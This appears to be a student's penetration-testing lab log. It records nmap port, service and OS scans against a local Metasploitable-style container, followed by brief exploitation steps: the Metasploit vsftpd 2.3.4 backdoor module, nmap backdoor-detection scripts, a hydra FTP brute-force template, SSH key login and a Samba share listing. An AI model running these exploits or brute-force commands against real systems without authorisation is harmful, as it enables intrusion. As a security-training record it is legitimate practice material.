#Commands Runned
 
  234  nmap 172.17.0.3
  235  nmap -p 80 172.17.0.3
  236  nmap -p 1-65535 localhost
  237  nmap -sP 172.17.0.3
  239  nmap --open 172.17.0.3
  240  namp -sV 172.17.0.3
  243  nmap -Pn 100.72.75.175
  256  sudo nmap -f 172.17.0.3
  258  sudo nmap -sV -T4 -F insecure.org
  259  sudo nmap -sV -T4 -F 172.17.0.2
  263  sudo nmap -sS 172.17.0.3
  265  sudo nmap -sT 172.17.0.3
  267  sudo nmap -sT 100.72.75.175
  268  sudo nmap -sS -sV -p21 172.21.128.1
  270  sudo nmap -sS -sV -p21 -o 172.17.0.3
  271  sudo nmap -O -v scanme.nmap.org
  272  nmap -sV -O -v 172.17.0.3
  273  sudo nmap -sV -O -v 172.17.0.3
  274  sudo nmap -sU 172.17.0.3

#Commands OutPut 


┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ nmap 172.17.0.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 03:08 IST
Nmap scan report for 172.17.0.3
Host is up (0.019s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 9.70 seconds

┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ nmap -p 80 172.17.0.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 03:09 IST
Nmap scan report for 172.17.0.3
Host is up (0.0046s latency).

PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 1.07 seconds

┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ nmap -p 1-65535 localhost
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 03:09 IST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000039s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 0.82 seconds

┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ nmap -sP 172.17.0.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 03:10 IST
Nmap scan report for 172.17.0.3
Host is up (0.0024s latency).
Nmap done: 1 IP address (1 host up) scanned in 5.06 seconds

┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ nmap -- open 172.17.0.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 03:11 IST
Failed to resolve "open".


┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ nmap --open 172.17.0.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 03:11 IST
Nmap scan report for 172.17.0.3
Host is up (0.0080s latency).
Not shown: 998 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 5.90 seconds

┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ namp -sV 172.17.0.3
-bash: namp: command not found

┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ nmap -sV 172.17.0.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 03:12 IST
Nmap scan report for 172.17.0.3
Host is up (0.0043s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE VERSION
80/tcp  open  http?
443/tcp open  https?

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 223.59 seconds

┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ nmap -sP 100.72.75.175
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 03:18 IST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 3.05 seconds

┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ nmap -Pn 100.72.75.175
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 03:18 IST
Nmap scan report for 100.72.75.175
Host is up (0.0079s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https
Sync Scan:
Nmap done: 1 IP address (1 host up) scanned in 11.40 seconds
┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ sudo nmap -sS 172.17.0.3
[sudo] password for mayank_201b153_kali:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 12:27 IST
Nmap scan report for 172.17.0.3
Host is up (0.11s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 26.98 seconds

┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ sudo nmap Ip-Address
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 12:29 IST
Nmap scan report for DESKTOP-5QE9N93.mshome.net (Ip-Address)
Host is up (0.00064s latency).
Not shown: 997 filtered tcp ports (no-response)
PORT    STATE SERVICE
135/tcp open  msrpc
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:15:5D:AC:BA:7C (Microsoft)

Nmap done: 1 IP address (1 host up) scanned in 5.23 seconds
TCP Scan:
┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ sudo nmap -sT 172.17.0.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 12:30 IST
Nmap scan report for 172.17.0.3
Host is up (0.0081s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Nmap done: 1 IP address (1 host up) scanned in 9.72 seconds

Version Details:
┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ sudo nmap -sS -sV -p21 Ip-Address
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 12:35 IST
Nmap scan report for DESKTOP-5QE9N93.mshome.net (Ip-adress)
Host is up (0.00038s latency).

PORT   STATE    SERVICE VERSION
21/tcp filtered ftp
MAC Address: 00:15:5D:AC:BA:7C (Microsoft)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.30 seconds

┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ sudo nmap -sV -T4 -F insecure.org
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 12:51 IST
Nmap scan report for insecure.org (45.33.49.119)
Host is up (0.0074s latency).
Other addresses for insecure.org (not scanned): 2600:3c01:e000:3e6::6d4e:7061
rDNS record for 45.33.49.119: ack.nmap.org
Not shown: 98 filtered tcp ports (no-response)
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.6
443/tcp open  ssl/http Apache httpd 2.4.6
Service Info: Host: issues.nmap.org

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 31.45 seconds

Os -Version Detection:
┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ sudo nmap -sV -O -v 172.17.0.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 12:40 IST
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 12:40
Scanning 172.17.0.3 [4 ports]
Completed Ping Scan at 12:40, 0.12s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:40
Completed Parallel DNS resolution of 1 host. at 12:40, 5.04s elapsed
Initiating SYN Stealth Scan at 12:40
Scanning 172.17.0.3 [1000 ports]
Discovered open port 443/tcp on 172.17.0.3
Discovered open port 80/tcp on 172.17.0.3
Completed SYN Stealth Scan at 12:40, 4.91s elapsed (1000 total ports)
Initiating Service scan at 12:40
Scanning 2 services on 172.17.0.3
Service scan Timing: About 50.00% done; ETC: 12:45 (0:02:36 remaining)
Completed Service scan at 12:43, 166.49s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 172.17.0.3
NSE: Script scanning 172.17.0.3.
Initiating NSE at 12:43
Completed NSE at 12:44, 38.66s elapsed
Initiating NSE at 12:44
Completed NSE at 12:44, 8.19s elapsed
Nmap scan report for 172.17.0.3
Host is up (0.0054s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT    STATE SERVICE VERSION
80/tcp  open  http?
443/tcp open  https?
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running: Crestron 2-Series
OS CPE: cpe:/o:crestron:2_series
OS details: Crestron XPanel control system
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 225.93 seconds
           Raw packets sent: 2047 (92.588KB) | Rcvd: 13 (620B)
┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ sudo nmap -O -v scanme.nmap.org
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 12:39 IST
Initiating Ping Scan at 12:39
Scanning scanme.nmap.org (45.33.32.156) [4 ports]
Completed Ping Scan at 12:39, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 12:39
Completed Parallel DNS resolution of 1 host. at 12:39, 3.73s elapsed
Initiating SYN Stealth Scan at 12:39
Scanning scanme.nmap.org (45.33.32.156) [1000 ports]
Discovered open port 80/tcp on 45.33.32.156
Discovered open port 443/tcp on 45.33.32.156
Completed SYN Stealth Scan at 12:39, 22.42s elapsed (1000 total ports)
Initiating OS detection (try #1) against scanme.nmap.org (45.33.32.156)
Retrying OS detection (try #2) against scanme.nmap.org (45.33.32.156)
Nmap scan report for scanme.nmap.org (45.33.32.156)
Host is up (0.022s latency).
Other addresses for scanme.nmap.org (not scanned): 2600:3c01::f03c:91ff:fe18:bb2f
Not shown: 996 filtered tcp ports (no-response)
PORT     STATE  SERVICE
80/tcp   open   http
443/tcp  open   https
3128/tcp closed squid-http
8080/tcp closed http-proxy
Aggressive OS guesses: OpenWrt 0.9 - 7.09 (Linux 2.4.30 - 2.4.34) (92%), OpenWrt White Russian 0.9 (Linux 2.4.30) (92%), OpenWrt Kamikaze 7.09 (Linux 2.6.22) (92%), Crestron XPanel control system (92%), HP PSC 2400-series Photosmart printer (90%), Linux 2.4.18 (88%), Netgear WGR614v7 wireless broadband router (88%), D-Link DIR-835 WAP (87%), Linux 3.18 (86%), Nintendo Wii game console (86%)
No exact OS matches for host (test conditions non-ideal).
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros

Read data files from: /usr/bin/../share/nmap
OS detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.17 seconds
           Raw packets sent: 3082 (139.536KB) | Rcvd: 50 (3.168KB)

Fast-Scan:
┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ sudo nmap -f  Ip-Address
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 12:50 IST
Nmap scan report for DESKTOP-5QE9N93.mshome.net (Ip-Address)
Host is up (0.00051s latency).
All 1000 scanned ports on DESKTOP-5QE9N93.mshome.net (172.21.128.1) are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)
MAC Address: 00:15:5D:AC:BA:7C (Microsoft)

Nmap done: 1 IP address (1 host up) scanned in 21.53 seconds

UDP-Scan:
┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ sudo nmap -sU 172.17.0.3
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 12:45 IST
Warning: 172.17.0.3 giving up on port because retransmission cap hit (10).
Stats: 1:06:20 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 72.93% done; ETC: 14:16 (0:24:36 remaining)
Stats: 1:06:27 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 73.07% done; ETC: 14:16 (0:24:27 remaining)
Stats: 1:06:28 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 73.08% done; ETC: 14:16 (0:24:27 remaining)
Stats: 1:06:29 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 73.18% done; ETC: 14:16 (0:24:20 remaining)
Stats: 1:06:30 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 73.19% done; ETC: 14:16 (0:24:20 remaining)
Stats: 1:06:31 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 73.20% done; ETC: 14:16 (0:24:19 remaining)
Stats: 1:06:32 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 73.21% done; ETC: 14:16 (0:24:19 remaining)
Stats: 1:06:33 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 73.21% done; ETC: 14:16 (0:24:19 remaining)
Nmap scan report for 172.17.0.3
Host is up (0.0092s latency).
All 1000 scanned ports on 172.17.0.3 are in ignored states.
Not shown: 963 filtered udp ports (admin-prohibited), 37 open|filtered udp ports (no-response)

Nmap done: 1 IP address (1 host up) scanned in 5446.35 seconds


Using Rapind7 as Exploiter for Ports like:
Telenet:
msfadmin@321a9866fd8c:~$ telnet 172.17.0.2 21
Trying 172.17.0.2...
Connected to 172.17.0.2.
Escape character is '^]'.
220 (vsFTPd 2.3.4)
421 Timeout.
Connection closed by foreign host.
To exploit VSFTPD valunerability:
  301  nmap –script ftp-vsftpd-backdoor –p 21 172.17.0.2
  302  nc [172.17.0.2]6667
  303  nmap –A –p 6667 172.17.0.2
  304  nmap –sV –script irc-unrealircd-backdoor –p 6667 172.17.0.2
VSFTPD badckdoor in msfconsole:
msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show targets
msf exploit(vsftpd_234_backdoor) > set TARGET 172.17.0.2
msf exploit(vsftpd_234_backdoor) > show options
msf exploit(vsftpd_234_backdoor) > exploit

FTP:
┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ sudo nmap -p 21 172.17.0.2
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-30 21:06 IST
Nmap scan report for 172.17.0.2
Host is up (0.0061s latency).

PORT   STATE    SERVICE
21/tcp filtered ftp

Nmap done: 1 IP address (1 host up) scanned in 5.84 seconds
┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ nc -nv 172.17.0.2 21
(UNKNOWN) [172.17.0.2] 21 (ftp) : Connection timed out
ftp 172.17.0.2
┌──(mayank_201b153_kali㉿DESKTOP-5QE9N93)-[~]
└─$ ftp 172.17.0.2
ftp: Can't connect to `172.17.0.2:21': Connection timed out
ftp: Can't connect to `172.17.0.2:ftp'
hydra [-L users.txt or -l anonymous] [-P pass.txt or -p 123456789] -f [-S port] ftp://X.X.X.X
nmap -p 21 --script [script name] 172.17.0.2
SSH:
commands used:
   27  ssh ignite@172.17.0.2
   28  ssh ignite@172.17.0.2
   29  ssh-keygen
   30  cd .ssh
   31  ls
   32  cat id_rsa.pub > authorized_keys
   33  ls
   34  nano /etc/ssh/sshd_config
   35  sudo nano /etc/ssh/sshd_config
   36  ssh msfadmin@172.17.0.2

root@321a9866fd8c:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
cc:26:b1:7d:34:38:6e:26:09:67:4d:99:4b:28:63:10 root@321a9866fd8c
msfadmin@321a9866fd8c:~$ cd .ssh
ls
cat id_rsa.pub > authorized_keysmsfadmin@321a9866fd8c:~/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub  known_hosts
msfadmin@321a9866fd8c:~/.ssh$ cat id_rsa.pub > authorized_keys
msfadmin@321a9866fd8c:~/.ssh$ ls
authorized_keys  id_rsa  id_rsa.pub  known_hosts
msfadmin@321a9866fd8c:~/.ssh$ nano /etc/ssh/sshd_config
msfadmin@321a9866fd8c:~/.ssh$ sudo nano /etc/ssh/sshd_config

In msfconsole:
msf > use auxiliary/scanner/ssh/ssh_login_pubkey
msf auxiliary(ssh_login_pubkey) > set KEY_FILE /tmp/r00tprivatekey
KEY_FILE => /tmp/id_rsa
msf auxiliary(ssh_login_pubkey) > set USERNAME root
USERNAME => root
msf auxiliary(ssh_login_pubkey) > set RHOSTS 172.17.0.2
RHOSTS => 172.17.0.2
msf auxiliary(ssh_login_pubkey) > run

Through Sammba Port:
smbClient:
Domain=[321A9866FD8C] OS=[Unix] Server=[Samba 3.0.28a]

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        tmp             Disk      oh noes!
        opt             Disk
        IPC$            IPC       IPC Service (321a9866fd8c server (Samba 3.0.28a))
        msfadmin        Disk      Home Directories
Domain=[321A9866FD8C] OS=[Unix] Server=[Samba 3.0.28a]

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            321A9866FD8C


